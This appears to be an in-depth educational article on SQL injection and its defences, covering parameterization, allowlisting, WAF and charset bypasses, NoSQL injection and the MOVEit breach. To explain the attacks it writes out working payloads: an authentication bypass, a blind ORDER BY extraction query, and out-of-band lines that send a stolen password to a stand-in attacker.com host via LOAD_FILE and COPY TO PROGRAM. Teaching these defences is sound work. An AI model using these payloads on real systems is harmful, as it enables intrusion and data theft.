SQL Injection: Beyond Parameterized Queries
In May 2023, a SQL injection flaw in MOVEit Transfer (CVE-2023-34362), a managed file-transfer product sitting inside banks, governments, and payroll processors, was turned by the Cl0p group into one of the largest breaches of the decade, with large-scale downstream impact across a wide swath of organizations and the people whose data they held. The vulnerability class behind it was first publicly documented in 1998. That distance, a quarter century between "we understand this completely" and "it still owns the enterprise," is the whole story of SQL injection. Everyone can recite the one-line fix. Almost nobody applies it in every place it is needed, and the gaps it leaves are where real bugs live. What follows works up from the textbook payload to the techniques that still breach the enterprise, one level at a time.
The PDF is the summary; what follows is the full treatment. Read it top to bottom, or jump to what you came to do:
- Learn how it works, end to end. The climb through Levels 1 to 4: breaking a string and the fix that holds, extracting data through blind channels and fingerprinting the engine, defeating filters and charsets, and the pivot from one query to the whole machine.
- Fix vulnerable code. Parameterize values and allowlist structure, then test it against the query-feature footguns and the bulk-import and cloud-warehouse surfaces where it hides.
- Review a PR or audit a framework. Code review with a pattern in mind, plus the framework safe API, dangerous hatch, correct bind matrix.
- Secure generated or LLM SQL. When a model writes the query.
- Contain the blast radius. Least privilege, RLS, views, encryption, and egress control for when one gets through.
- Prove it, and plan for failure. A verification program that shows the defense is real, and an incident plan for the day it is not.
- If you read nothing else, jump to "The whole thing on one card" near the end.
What SQL injection actually is
SQL injection is usually taught as "the attacker put a quote in your input." That is the symptom. The cause is structural. Your application assembles a statement by concatenating a query template you wrote with data you did not, then hands the database one flat string. The parser then has to recover your intent from bytes, and it cannot, because nothing in that string marks where your trusted structure ends and the attacker's data begins. Code and data travel the same channel. Formally this is CWE-89, and it anchors the A05:2025 Injection category in the OWASP Top 10.
Every member of the injection family, OS command, LDAP, XPath, ORM/HQL, template injection, is this same collapse in a different interpreter, and prompt injection (which the closing section returns to) is the same kind of trust-boundary collapse again. The mental shift that pays off: stop hunting "dangerous characters" and treat the bug as two trust domains merged into one string.
Where it hides in real apps
The login form is where SQL injection is taught and almost never where it lives. Injection follows data, and data arrives from far more places than the obvious field. Any value that reaches a query is a candidate, no matter how trustworthy it looks:
- Request metadata, not just the body, headers, cookies, and path parameters.
Documented cases include injection through the
Hostheader and even fields lifted from a client TLS certificate. - Structured bodies and APIs, JSON fields and the filter and sort grammars of GraphQL and OData resolvers, which routinely compile down to SQL. A typed GraphQL schema validates the shape of a request, not the safety of the resolver behind it: if that resolver still concatenates an argument into SQL, the endpoint is injectable like any other, and the type system has bought you nothing.
- Bulk and external inputs, CSV and file imports, third-party webhooks, and SSO/SAML/OIDC profile fields (display name, group, department) that you did not author and the identity provider did not sanitize for you.
- Upload and file metadata, the filename, object key, content-type, and archive entry names that ride along with an upload and then flow into queries through imports, document management, and admin search, long after the file itself was handled.
- Internal and deferred paths, admin and report builders that assemble queries from user choices, background jobs that process the data hours later, and stored data reused in a new query long after it was safely inserted (the second-order case).
- Generated SQL from natural language, the 2026 addition: LLM agents, analytics assistants, "ask your data" features, and text-to-SQL report builders that compose queries from untrusted instructions. It is query generation driven by attacker-influenceable input, a structural-query risk rather than just another input source, so it gets its own treatment under the footguns below.
The common thread is that none of these feel like attacker input at the point of use. A header looks like infrastructure, an SSO field looks like it came from a trusted provider, a row in your own database looks like your data. The query does not care where the bytes came from; if they were ever attacker-influenced, they still are when they reach the parser. So, no, it is not just login forms.
The classic case
Everything starts with a value that lands inside a quoted string and an application that builds its query by gluing that value in.
Breaking out of the string
The simplest injectable code concatenates input straight into SQL:
# the value is glued straight into the query text
cur.execute("SELECT * FROM users WHERE email = '" + email + "'")
Send ' OR '1'='1' -- as the email and the logic flips. The leading quote closes the
string, OR '1'='1' makes the WHERE clause always true, and
-- comments out whatever followed. The query returns every row, which on a login
form is an authentication bypass. From the same foothold, UNION SELECT grafts
columns from other tables onto the results, and a verbose database error will happily print the
data it choked on. And it is not only reads: the same always-true condition dropped into an
UPDATE or DELETE rewrites or erases rows in bulk, and a writable
injection point can INSERT attacker-chosen data, so injection threatens integrity
and availability, not just confidentiality. That is the whole of basic SQL injection: close the
quote, rewrite the logic, and read or change data you were never meant to touch.
Parameterize, and don't try to sanitize
For most application code, the first move is to use your ORM or query builder's typed,
value-binding APIs, filter(User.email == email), where({ email }), and
the like, which bind the values for you. The caveat is that many of the same libraries also
expose raw-string overloads, where("email = #{x}") or a raw() escape
hatch, that do not bind and reopen the hole, so the rule is to stay on the typed API and treat
the raw one as raw SQL. Reach for raw SQL only when you genuinely need it. The rest of this
section is what "parameterize" actually means underneath, so that when you do touch raw SQL you
know what the safe version is doing.
The fix everyone recites is correct, and the mechanism is the reason it works. The required control is a parameterized API that preserves the separation of code and data: you write the SQL with placeholders and pass the values separately, so the structure you wrote and the values you did not never share the parser's input as one string. The strongest form of that boundary is a server-side bind, the server parses the SQL with placeholders first, freezing the structure, then the values arrive as data on execute, never reaching the parser as code. Not every stack keeps a persistent server-side prepared statement, and that is fine: what matters is that the API preserves code/data separation, not that a prepared statement literally lives on the server. The failure mode to avoid is the other direction, drivers that emulate the bind client-side by interpolating and escaping before they send one string; that is acceptable only when the driver's charset and config are correct, and is best disabled where you can, because emulation drops you back onto escaping and the traps a few sections down.
# the SQL is parsed first; email is bound as a value, never as code
cur.execute("SELECT * FROM users WHERE email = %s", (email,))
A common point of confusion: placeholder syntax varies by driver, %s,
?, :name, or $1 depending on the database and library.
The %s above is a driver bind marker, not Python % string
interpolation and not an f-string, which is precisely why the value never reaches the SQL parser
as code.
One thing parameterization is not: authorization. Binding tenant_id,
account_id, or user_id makes the value safe from injection, but if the
attacker is allowed to choose someone else's ID, you have just safely run an unauthorized query.
Access control is a separate check you still owe on top of the bind.
The tempting shortcut is to clean the input by hand instead, strip the quotes and keep concatenating. It does not work, and seeing why is the first real lesson. Stripping apostrophes blocks the textbook payload, which is exactly why it feels safe:
# "sanitized" by deleting quotes, then concatenated anyway
email = user_input.replace("'", "")
cur.execute("SELECT * FROM users WHERE email = '" + email + "'")
But plenty of injection needs no quote at all. The moment the value sits in a numeric or otherwise unquoted position, the apostrophe is irrelevant:
# id is numeric, so there is no quote to break out of
cur.execute("SELECT * FROM accounts WHERE id = " + user_input.replace("'", ""))
# attacker sends: 0 OR 1=1
# query becomes: SELECT * FROM accounts WHERE id = 0 OR 1=1 (every row)
Sanitizing asks "does this input look dangerous?", a question with infinitely many wrong answers. Parameterization asks nothing about the input at all, which is exactly why it works where hand-cleaning cannot.
No output, no problem
Real targets rarely echo your query back, and they are rarely the database you assumed. The intermediate game is pulling data through narrow channels and fingerprinting the engine so your payloads actually fire.
Extracting data through a keyhole
What an attacker can do depends on what the application hands back. As defenders close the loud channels, attackers move to the quiet ones, so a scanner that only flags the first row below is testing the easiest tenth of the problem.
| Channel | How it works | The tell |
|---|---|---|
| Error-based | Data leaks through verbose database error messages. | DB errors shown to the user |
| UNION-based | UNION SELECT grafts attacker columns onto the result set. |
Extra or mismatched rows |
| Boolean blind | Nothing is returned, but the response differs on a true/false condition. | Same page, content varies by input |
| Time blind | The query pauses on a condition (SLEEP,
WAITFOR DELAY). |
Response latency tracks the payload |
| Out-of-band | The database makes an outbound DNS, HTTP, or SMB request carrying data or credentials. | Traffic from the DB to attacker infra |
Fingerprinting the engine
The classes above hold everywhere, but the payloads do not. Every engine speaks a different dialect, which is why an attacker fingerprints your database before anything else: a string that works on MySQL is inert on Oracle. Knowing the differences is the line between "I think this is injectable" and a working exploit.
| Technique | MySQL | PostgreSQL | SQL Server | Oracle |
|---|---|---|---|---|
| String concat | CONCAT(a,b) |
a || b |
a + b |
a || b |
| Comment to EOL | -- or # |
-- |
-- |
-- |
| Time delay | SLEEP(5) |
pg_sleep(5) |
WAITFOR DELAY '0:0:5' |
DBMS_PIPE.RECEIVE_MESSAGE('x', 5) |
| Stacked queries | Off by default | Simple protocol only | Yes | No |
| Version string | @@version |
version() |
@@version |
SELECT banner FROM v$version |
| Current user | current_user() |
current_user |
SYSTEM_USER |
SELECT user FROM dual |
The row to watch is stacked queries, the ability to chain a second statement after a semicolon.
Where it is allowed, classically SQL Server, an injection jumps from reading data to running
INSERT, UPDATE, or system commands. But this is a property of the
driver and wire protocol as much as the engine: PostgreSQL permits multiple statements over its
simple query protocol yet not the extended (prepared) protocol, so a parameterized call usually
cannot stack, and most MySQL drivers disable multi-statements by default. Oracle does not stack
at all in ordinary SQL statement contexts, which is why Oracle injection leans on subqueries and
out-of-band tricks instead, though an injectable PL/SQL block or dynamic PL/SQL is a different
story and can execute several statements. Treat the column as "possible," not "guaranteed," and
note the smaller detail that the MySQL -- comment needs a trailing space while
# does not. Read these as the canonical form, not a guarantee that each fires
anywhere: several depend on a package grant, a driver or protocol setting, or the execution
context, Oracle's DBMS_PIPE.RECEIVE_MESSAGE needs EXECUTE on the
package, the file and OS primitives further down need their own privileges, and stacking
depends on the multi-statement support above, so confirm the precondition before assuming a
payload is callable.
SQLite belongs in the conversation even though it is not in the table: it is everywhere modern
software hides, desktop and mobile apps, browser extensions, internal tools, and increasingly AI
and agent integrations. Its blast radius is smaller, no server, no network, and stacking that
depends entirely on the wrapper: prepared execute APIs usually reject a
multi-statement string in one call, while exec and script helpers
(sqlite3_exec, executescript) will happily run several statements at
once. "Smaller" is not "low risk," though: depending on the wrapper and config, injection can
still abuse local-file-adjacent features like ATTACH DATABASE, dangerous pragmas,
and load_extension where it is enabled. Either way injection against it is real and
increasingly common, and the same parameterize-and-allowlist rules apply, plus a few
SQLite-specific ones: disable extension loading, consider an authorizer callback
(sqlite3_set_authorizer) to veto dangerous operations, and set
trusted_schema=OFF where it is relevant.
Cover the gaps parameterization leaves
Parameterization binds values. It cannot bind structure. That single distinction accounts for most of the injection that still turns up in otherwise modern codebases.
-
Identifiers and syntax
You cannot bind a table name, a column name, a sort direction, or a keyword. So every dynamic feature, sort by a user-chosen column, choose which columns to return, a configurable table, falls back to concatenation.
ORDER BY " + columnis the canonical case and it is everywhere. The only safe handling is an allowlist: map the user's input to a fixed, hardcoded set of permitted identifiers and reject anything else. The rule is never accept a raw user-chosen identifier and never rely on escaping alone to make one safe; allowlist first, then quote the trusted identifier the allowlist returns. Identifier-quoting helpers (quote_ident,QUOTENAME, an ORM's identifier escaper) exist for trusted or generated names, schema introspected at startup, not for accepting an arbitrary user-chosen table or column. Quoting is also not authorization:quote_identonly stops a name from breaking the SQL syntax, so a safely-quotedpg_shadowor a secrets table is still the wrong table, returned cleanly. The allowlist closes both holes at once, the broken query and the unauthorized one, because it also decides which names are permitted in the first place. Some dialects do expose identifier-specific APIs, such as Databricks'sIDENTIFIER()clause, that accept a parameter marker in a name position; treat that as a convenience, not a loophole, and still feed it only allowlisted, authorization-checked names, since binding a name does not make an arbitrary user-chosen one safe.A sortable identifier is also not a minor bug, it is full data extraction. An attacker who controls the
ORDER BYexpression can read data one character at a time by sorting on a condition, even on an endpoint that never prints the value:ORDER BY (CASE WHEN (SELECT substring(password,1,1) FROM users WHERE is_admin LIMIT 1)='a' THEN id ELSE -id END)If the rows come back in ascending
idorder, the first character isa; if the order is reversed, it is not. Walk the positions and the alphabet and the whole secret falls out. The exact syntax is dialect-adjusted in practice,substring, the single-row limit, and the sort expression all vary by engine, but the technique is universal. That is why the control is an allowlist, never escaping and never hoping the column is harmless. -
Dynamic IN lists
WHERE id IN (?)does not expand a list in most drivers, so people concatenate it and reopen the hole. Generate one placeholder per element and bind each value, or use a real array binding where the driver offers one: PostgreSQL's= ANY($1::int[]), SQL Server table-valued parameters, or your ORM's expanding-bind helper. Handle the empty list explicitly, sinceIN ()is a syntax error in most engines, so an empty filter has to short-circuit rather than build a broken or accidentally concatenated query. Be deliberate about what "empty" means, too: "no filter supplied" and "a filter supplied with zero matching IDs" are different intents. For aWHERE id IN (selected_ids)filter, an empty selection should usually becomeWHERE falseand return no rows, not silently drop the clause and widen access to everything. Cap the list length, too: even a safely bound list of thousands of placeholders becomes an availability problem and can hit driver or statement limits, so for large sets reach for a temp table, table-valued parameters, bulk-loaded IDs, or a server-side join instead. The temp-table option is for trusted, application-built queries, not for generated or user-authored SQL, where temporary objects are a side-effect surface to block rather than a tool to reach for (more on that under generated SQL).# empty filter must match nothing, not drop the clause if not ids: return [] # one placeholder per element, then bind each value placeholders = ", ".join(["%s"] * len(ids)) cur.execute(f"SELECT * FROM orders WHERE id IN ({placeholders})", ids) # or bind the whole array on PostgreSQL, no placeholder math cur.execute("SELECT * FROM orders WHERE id = ANY(%s::int[])", (ids,)) -
Second-order injection
Input that was safely parameterized on the way in is still untrusted on the way out. Store
x' OR '1'='1cleanly, then later build a query by concatenating that stored value, and you are injected. Your insert was fine; your read was not. Taint does not expire because data sat in a table.# write path is parameterized and fine; name = "x' OR '1'='1" cur.execute("INSERT INTO users (name) VALUES (%s)", (name,)) # later, a different path reuses the stored value by concatenation row = get_user(uid) cur.execute("SELECT * FROM logs WHERE who = '" + row["name"] + "'") # injected on read # fix: stored data is still input, so bind it again on the way out cur.execute("SELECT * FROM logs WHERE who = %s", (row["name"],)) -
Stored procedures and ORMs are not magic
"Use stored procedures" only helps if the procedure uses static or properly parameterized dynamic SQL; a proc that runs
EXEC('SELECT ... ' + @input)is just as vulnerable. The fix is the same inside a procedure as outside it, bind the values:sp_executesqlwith parameters on SQL Server,EXECUTE ... USINGin PostgreSQL PL/pgSQL,EXECUTE IMMEDIATE ... USINGin Oracle. Where the dynamic part is an object name rather than a value, allowlist it and apply the engine's safe identifier formatting (quote_ident,QUOTENAME,format('%I', ...)); never splice a caller-controlled name in raw. ORMs are safer by default but ship escape hatches that bypass their own protection: string-built Hibernate/JPA HQL, Django.extra()/.raw(), Railswhere("... #{x}"), Sequelizeliteral(), KnexwhereRaw, Prisma$queryRawUnsafe(this is an illustrative sample, not the full list, the framework matrix later carries the fuller reference for the stacks covered). Each is a concatenation point in an ORM's clothing, and they cluster in exactly the features, search, reporting, dynamic filters, where identifier binding already failed. There is a second, sharper risk with procedures: their execution context. SQL ServerEXECUTE AS, Oracle definer-rights packages, PostgreSQLSECURITY DEFINER, and ownership chaining all let a proc run with privileges the caller does not have, so a vulnerable one becomes privilege escalation even when the app role itself is tightly constrained. A constrained app role does not contain an injectable definer-rights proc; that has to be audited on its own.-- vulnerable: dynamic SQL concatenated inside the proc EXEC('SELECT * FROM users WHERE name = ''' + @name + ''''); -- safe: parameterize the dynamic SQL EXEC sp_executesql N'SELECT * FROM users WHERE name = @name', N'@name nvarchar(100)', @name = @name;
Here is the allowlist pattern in practice, for the sort case that parameterization can't reach:
SORT = {"date": "created_at", "name": "last_name"} # fixed allowlist
DIR = {"asc": "ASC", "desc": "DESC"} # direction is allowlisted too
col = SORT.get(request.args.get("sort"))
direction = DIR.get(request.args.get("dir"))
if col is None or direction is None: # unknown input is rejected, not defaulted
raise BadRequest("invalid sort")
query = f"SELECT ... ORDER BY {col} {direction}" # tokens are not attacker-controlled
Defeating the defenses
Now the target has parameterized the easy paths and bolted a WAF in front. Advanced work lives in the layers underneath: the filter, the character set, and the databases that aren't SQL at all.
Beating filters and WAFs
Every blocklist invites a bypass, and SQL's flexibility makes them cheap. Attackers break
keywords with inline comments (UN/**/ION, or MySQL's versioned
/*!50000UNION*/ that runs only on MySQL), vary case (SeLeCt), swap
whitespace for comments or exotic bytes (%09, %0a, /**/,
parentheses), and encode the payload one or more layers deep, URL, double-URL, unicode, hex
literals like 0x53454c454354, or CHAR()/CHR()
concatenation. The logic is just as fluid: OR 1=1 becomes OR 2>1,
OR 'a'='a', or &&. None of this is manual labor:
sqlmap's --tamper scripts apply these transforms automatically,
swapping spaces for inline comments (SELECT/**/password), randomizing case, and
URL- or hex-encoding the payload, so a static regex blocklist is bypassed on the first automated
pass.
Anything that tries to recognize malicious SQL in a string is playing a game it eventually loses.
The deeper reason WAFs fail is a parser differential. The WAF and the database do not parse SQL the same way: the WAF normalizes input and matches it against its own approximation of the grammar, while the database has the real one. Any construct the two interpret differently, a comment style the WAF strips but the engine honors, an encoding the engine decodes but the WAF does not, a multibyte sequence they disagree on, is a bypass waiting to be found, and that gap never fully closes. The differential is not only in SQL parsing; it starts at request parsing. Duplicate parameters, mixed JSON and form bodies, content-type confusion, proxy normalization, and a framework's parameter-precedence rules can all mean the value the WAF inspected is not the value that reaches the query. If the WAF and the app disagree on which copy of a parameter wins, the inspected one can be harmless while the live one is not.
Encoding and charset tricks
Escaping is not even a fixed operation; whether it neutralizes a quote depends on the character
set. (And if your "prepared" statements are actually emulated client-side, common with PHP PDO's
ATTR_EMULATE_PREPARES = true on MySQL, you are back on escaping entirely, with
everything below in play.)
Multibyte charsets defeat byte-wise escaping. In encodings like GBK, Big5, or
Shift-JIS, some lead bytes combine with the following byte to form one character. A
charset-naive escaper that inserts 0x5c (\) before a quote can be
tricked: send 0xbf 0x27, the escaper produces 0xbf 0x5c 0x27, and
because 0xbf5c is a single valid GBK character, the backslash is swallowed as its
trailing byte, leaving the 0x27 (') live. UTF-8 is immune to this
specific trick, since its continuation bytes never include 0x5c, which is one more
reason utf8mb4 should be the default everywhere. It does not make escaping safe in
general, though, it just closes this one multibyte hole; parameterization is still the control.
Setting the charset with a query is not enough.
mysql_real_escape_string() escapes according to the charset the client
library believes is active. Running SET NAMES gbk as a query changes the
server's view but not the client's, so the escaper keeps treating input as single-byte and stays
vulnerable. The charset has to be set through the API (mysql_set_charset(),
mysqli::set_charset(), or a PDO DSN charset=). A great deal of "we
escape and we set the charset" code was exploitable for exactly this reason. Set it when the
connection is created, not after: a query that escapes input can run before a later charset
call, and some drivers will not retroactively update their client-side state.
A character can change after you validate it. Charset conversions are not always
faithful. Windows "best-fit" mapping, for one, transcodes certain non-ASCII characters to the
nearest ASCII look-alike: a fullwidth or modifier apostrophe that sailed through validation and
escaping can be converted into a plain 0x27 quote by a downstream code-page
conversion, arriving at the database as a live quote you never inspected.
The NoSQL cousin
The boundary failure is not unique to SQL; it surfaces wherever untrusted input reaches a query
interpreter, just with different grammar. MongoDB is the common case. An application that trusts
a JSON body and passes it straight into a query lets an attacker substitute operators for
values: send {"user":"admin","pass":{"$ne":null}} and the password check becomes
"not equal to nothing," which is always true. The sharper edge is the JavaScript sinks,
$where, legacy mapReduce, and the aggregation $function,
which evaluate server-side JavaScript and turn injection into database-side code execution,
running inside the engine's JavaScript environment, rather than just data disclosure. That is
not automatically an OS shell, but arbitrary logic running in the database is more than enough
to read and tamper at will.
The defenses mirror the SQL ones: pass scalar values into queries rather than raw request
objects, validate the shape of anything you do accept and reject unexpected operator keys like
$ne or $where, enforce a schema, and avoid the server-side JavaScript
operators entirely. Crucially, that validation has to be recursive: checking only the top level
misses operators smuggled into nested objects, array elements, dotted keys, or update operators.
Validate the whole object shape against a schema and extract scalars explicitly, rather than
trusting that a clean first level means a clean payload. And it is not only the filter: the same
structural problem reaches update documents, projections, sort objects, and aggregation
pipelines, all of which are attacker-shaped objects too. The defensive pattern is not "block
$ne," it is to build each of those, the $set document, the projection,
the sort, the pipeline stages, from route-specific allowlists, exactly as you allowlist
structure in SQL.
// vulnerable: the raw request body becomes the query filter
db.users.findOne(req.body) // {"user":"admin","pass":{"$ne":null}}
// safe: validate types first and reject non-scalars, so an object or array
// can never slip in as an operator; then query with the checked values
const { user, pass } = req.body;
if (typeof user !== "string" || typeof pass !== "string") {
throw new Error("user and pass must be strings");
}
db.users.findOne({ user, pass })
Fix it in the configuration
Server modes change the rules of escaping. MySQL's
NO_BACKSLASH_ESCAPES makes \ a literal, so quotes must be escaped by
doubling instead, and escaping code that assumes backslashes is then wrong. PostgreSQL has the
same story with standard_conforming_strings (off in old versions, on by default
since 9.1). ANSI_QUOTES turns " into an identifier quote. Escaping
correctness is a function of configuration you may not control; parameterization removes the
question.
So the advanced defenses are configuration, not cleverness: default to utf8mb4 and
set the connection charset through the driver rather than a stray SET NAMES,
normalize input to one encoding early (before you validate), prefer real server-side prepares
over emulation, and validate types as a fail-safe (an id is a positive integer; a password is a
string, not an object). Run the server in strict mode while you are at it: a non-strict MySQL
silently truncates an over-length value to fit its column, which is not injection but a classic
logic and authentication bypass (a registration that truncates down to collide with an existing
admin row), so reject over-length input rather than letting the database quietly
reshape it. Add resource limits to cap the cost of an attack you don't block outright. Two kinds
matter. Cost limits blunt extraction and denial of service: a per-user or per-role statement
timeout, a hard row or output cap on report and search endpoints, and an engine-specific
governor (SQL Server Resource Governor, query cancellation, a max execution time) so a single
greedy or time-based query cannot run away with the database. Bound memory and temp space as
well as time, since an injected query can exhaust sort or hash memory and spill to disk without
ever running long: cap temp-file size, set per-query or per-workload memory limits, and cap
result and response body size. Transaction limits stop a secondary outage: read-only
transactions on read paths, an idle_in_transaction_session_timeout where available,
and lock timeouts, so an injected query cannot park itself holding locks. Cap concurrency too,
not just individual queries: per-role connection limits and a bounded pool, so injection cannot
turn into an availability incident by spawning many slow queries or exhausting the connection
pool even when each query has its own timeout. The WAF stays, as detection and a speed bump,
never as the control standing between you and a breach.
From one injection to the whole machine
Everything so far reads or alters data. The top of the ladder is when a single injection becomes the server itself, and when it happens to thousands of servers at once.
From query to shell
The settings that decide blast radius are what turn a SELECT into a foothold. Where
multi-statements are allowed, an injection appends its own statement and pivots from read to
write. With the right privileges, MySQL's INTO OUTFILE writes a web shell to disk
where secure_file_priv permits it (the precondition the next paragraph breaks
down), xp_cmdshell on SQL Server runs operating-system commands, and Oracle's
UTL_HTTP reaches the network. And when nothing comes back in the response at all,
out-of-band channels exfiltrate anyway: the database is coerced into a DNS or HTTP lookup whose
hostname carries the stolen data. Out-of-band is not only data-in-DNS, either: on SQL Server and
Windows, a coerced UNC path (the xp_dirtree / xp_fileexist family)
makes the host reach out over SMB, which can leak or relay the service account's NetNTLM
credentials to an attacker-controlled share, turning a blind injection into credential capture.
Concretely, the secret becomes part of a hostname the attacker's DNS or SMB server resolves:
-- MySQL on Windows: the stolen value is the hostname; the UNC path forces a lookup
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\x'));
-- PostgreSQL (needs superuser / pg_execute_server_program): COPY pipes the value to
-- the program's stdin, which reads it and resolves it as a subdomain
COPY (SELECT password FROM users LIMIT 1) TO PROGRAM 'read x; nslookup "$x.attacker.com"';
Both need a privilege the application role has no reason to hold (FILE on MySQL,
superuser or pg_execute_server_program on PostgreSQL), which is exactly why least
privilege and egress control, below, are what close the channel.
Every one of those is a configuration choice, which is also where it is stopped:
- Multi-statement support (
allowMultiQueries=truein JDBC, theCLIENT_MULTI_STATEMENTSflag) lets an injection stack a second statement and pivot from read to write. This is a separate dial from emulated prepares: emulation is an escaping risk, while stacking depends on multi-statement capability being switched on. secure_file_priv(MySQL) governs the directional file primitives,INTO OUTFILEwrites a file,LOAD_FILE()reads one, andLOAD DATA INFILEimports one:NULLdisables file import/export entirely, a directory restricts it to that path, and empty means unrestricted, the last of which lets an injection drop a web shell or read arbitrary files.local_infileis a separate, often-confused dial: withLOAD DATA LOCAL INFILEthe server asks the client to send a file, and the client library will hand it over iflocal_infileis enabled, so the exposure is a file on the application host, not the database server. That still matters when an injection runs through a client that permits it.- Dangerous privileges and capabilities like
FILE(MySQL),xp_cmdshelland OLE automation (SQL Server), orUTL_FILE/UTL_HTTP(Oracle) turn aSELECTinto the filesystem, the OS, or the network.
The dangerous dials, by engine
The same capability is a different switch on each engine, and an injection's ceiling is set by which ones are left on. The containment goal is an application role that holds none of them.
| Capability | MySQL | PostgreSQL | SQL Server | Oracle |
|---|---|---|---|---|
| Prepared statements | Driver-dependent; for PDO check ATTR_EMULATE_PREPARES |
Server-side | Server-side | Server-side |
| Multi-statements | Off unless CLIENT_MULTI_STATEMENTS |
Simple protocol only | Allowed | Not allowed |
| File read / write | FILE, secure_file_priv (server);
local_infile (client) |
COPY ... TO/FROM, pg_read_server_files /
pg_write_server_files, pg_read_file,
pg_ls_dir, large-object import/export |
BULK INSERT, OLE Automation |
UTL_FILE directory |
| OS commands | UDF via written library | COPY ... PROGRAM (pg_execute_server_program),
untrusted PL |
xp_cmdshell, CLR, OLE |
DBMS_SCHEDULER, Java |
| Network / out-of-band | LOAD_FILE UNC (Windows) |
dblink, extensions |
OPENROWSET, xp_dirtree, xp_fileexist,
UNC paths |
UTL_HTTP, UTL_INADDR (DNS); needs network ACL |
The heaviest of these, CREATE EXTENSION on PostgreSQL, UNSAFE CLR
assemblies and external script runtimes (the sp_execute_external_script R/Python
family) alongside CLR and OLE on SQL Server, Java on Oracle, all require elevated privilege the
application role should never hold. The external-script and CLR runtimes are the modern
"database to code execution" family worth auditing specifically, not just the famous
xp_cmdshell. One caveat on this whole table: it is weighted toward self-managed
databases. Managed and cloud offerings often disable many of these OS and file primitives out of
the box, which removes the easiest shell paths but not the risk, and it trades them for a
cloud-era set: attached IAM and service roles, external tables and federated queries,
object-storage import and export, cloud-native extensions and data-lake connectors, and managed
network integrations. Those are the modern "query to the data lake or control plane" paths, and
data exfiltration, privilege misuse, and access to service credentials all remain firmly in
scope. Emulated prepares belong on the list too: a driver that interpolates client-side is back
on escaping, with the charset traps from Level 3 in play.
Automated, and at scale
None of this needs a person. sqlmap and tools like it automate the whole path:
they probe a parameter with boolean, error, time, UNION, and stacked-query techniques,
fingerprint the engine, then enumerate schemas and dump tables with no further input. Where the
database and its privileges allow, the same tool reads and writes files and drops to an OS
shell. The practical consequence is that "it is buried in an obscure parameter" is not a
control. If a scanner can reach the input, the injection will be found, often within minutes of
exposure.
Anatomy of a real one: MOVEit
MOVEit shows how short the distance can be between one injection and total compromise. The flaw
was a SQL injection in MOVEit Transfer's web tier, reachable before authentication. That alone
is serious; what made it catastrophic was how far the pivot reached. Public advisories reported
that the attackers used the injection to install the LEMURLOOT web shell
(human2.aspx), so the exploit chain ended with a web shell on disk, turning a
data-read bug into remote code execution and persistent access, then exfiltrating at scale
across thousands of downstream organizations. The chain is a checklist of missed containment: a
pre-auth injection point, an application and database path that could reach the filesystem, and
nothing stopping the pivot from query to shell.
Defense in depth, in priority order
- Parameterize every value, everywhere, including dynamic SQL inside stored procedures. This is the control. The rest is containment.
- Allowlist identifiers and syntax for anything you must vary: table, column, sort, keyword.
- Least privilege on the database account. The app should connect as a role
that can do exactly what it needs and nothing more: no DDL, no
xp_cmdshellorFILEprivilege, scoped to its schema. Injection through a least-privileged role reads only what that role can read; through a sysadmin role it owns the host. "Only what that role can read" is still potentially catastrophic, a reporting role can see a great deal, which is why least privilege has to be paired with the views, RLS, and column minimization below rather than relied on alone. - Control egress. Out-of-band exfiltration needs the database to reach the network. Most databases never should. Block it and an entire exfil class disappears. "Egress" is more than the public Internet, though: a database or app host that does not need outbound also should not be able to reach the cloud metadata service, internal admin and control-plane APIs, backup stores, or secret managers unless a specific function requires it, those internal endpoints are exactly what an SSRF-style DB integration or a coerced request would aim at next.
- Keep errors and charset clean. Don't return database errors to users; set a UTF-8 connection charset; prefer real prepares over emulation.
And instrument for the attack you cannot prevent. Automated injection is noisy in specific ways:
bursts of near-identical requests against a single parameter, repeated ORDER BY and
column-count probes as a tool feels out the query shape, time-based payloads that make response
latency step in clean intervals (pg_sleep, SLEEP,
WAITFOR), and queries that your application would never legitimately issue, catalog
sweeps of information_schema, pg_catalog, sysobjects, or
sqlite_master/sqlite_schema, lone UNION activity, and
file or command primitives like COPY, INTO OUTFILE, and
xp_cmdshell. Watch for those at the database and the application, not only the WAF,
and you catch the campaign while it is still enumerating rather than after it has exfiltrated.
Detection is only as useful as the attribution attached to it, though: log the database user,
the app or workflow name, the endpoint or job, the source host, the tenant, a request or
correlation ID, the deploy version, and a normalized query fingerprint alongside the query.
Seeing a suspicious SELECT is far less actionable when you cannot tie it back to
the route, tenant, deploy, or caller that produced it.
Where the signal lives differs by engine. These are the first sources to enable and watch, before an incident rather than during one:
| Engine | Audit and query telemetry to enable and watch |
|---|---|
| PostgreSQL | pg_stat_statements, pgaudit,
log_statement, and application_name tagged in logs
|
| SQL Server | SQL Server Audit, Extended Events, Query Store |
| MySQL / MariaDB | audit log plugin, general query log, slow query log |
| Oracle | Unified Auditing, Fine-Grained Auditing (FGA) |
| Snowflake | QUERY_HISTORY, ACCESS_HISTORY,
QUERY_TAG |
| BigQuery | Cloud Audit Logs, INFORMATION_SCHEMA.JOBS |
| Redshift | SYS/STL views, STL_QUERY,
STL_UNLOAD_LOG |
| Databricks | query history, Unity Catalog and workspace audit logs |
These sources are not equal, so treat the table as a starting point, not a guarantee of coverage. Most must be enabled deliberately (and some are edition- or permission-gated), several omit failed statements or particular query types, and a few log the full SQL text and bound values, which makes the telemetry itself sensitive. So: turn on what you need before an incident, protect and access-control the audit logs, log a normalized query fingerprint rather than raw SQL with values, attach request, tenant, and workflow attribution to every entry, and know each engine's retention and coverage limits so you are not surprised by what was never captured.
Modern query-feature footguns
"Parameterize values; allowlist structure" is the whole rule, but a surprising number of features blur the line between the two, and that blur is where careful teams still slip.
- LIKE wildcards. Binding a value into a
LIKEstill leaves%and_active inside it. That is not classic injection, but it lets a user turn a prefix search into a full-table scan or match far more than intended. Escape them with aLIKE ... ESCAPEclause when they should be literal, and escape in the right order: the escape character you pick (\,!, whatever) must itself be doubled or escaped first, then%and_, or an attacker manipulates the escaping layer itself by feeding in the escape character. Even when escaped, treat broad search as an availability concern: cap the term length, reject pathological patterns such as a leading%wildcard that defeats the index, and route genuinely open-ended search to an indexed or search-specific path rather than letting a%term%scan the table. Keep collation in mind as well: under a case- or accent-insensitive collation, even a correctly escaped pattern can match more rows than the literal text suggests, so match behavior is a function of the column's collation, not just the escaping. - LIMIT and OFFSET. Some drivers will not bind these, so people interpolate
them. They are values: coerce to integers and bind or clamp, never concatenate raw. Be
strict about the range while you are at it: reject negative
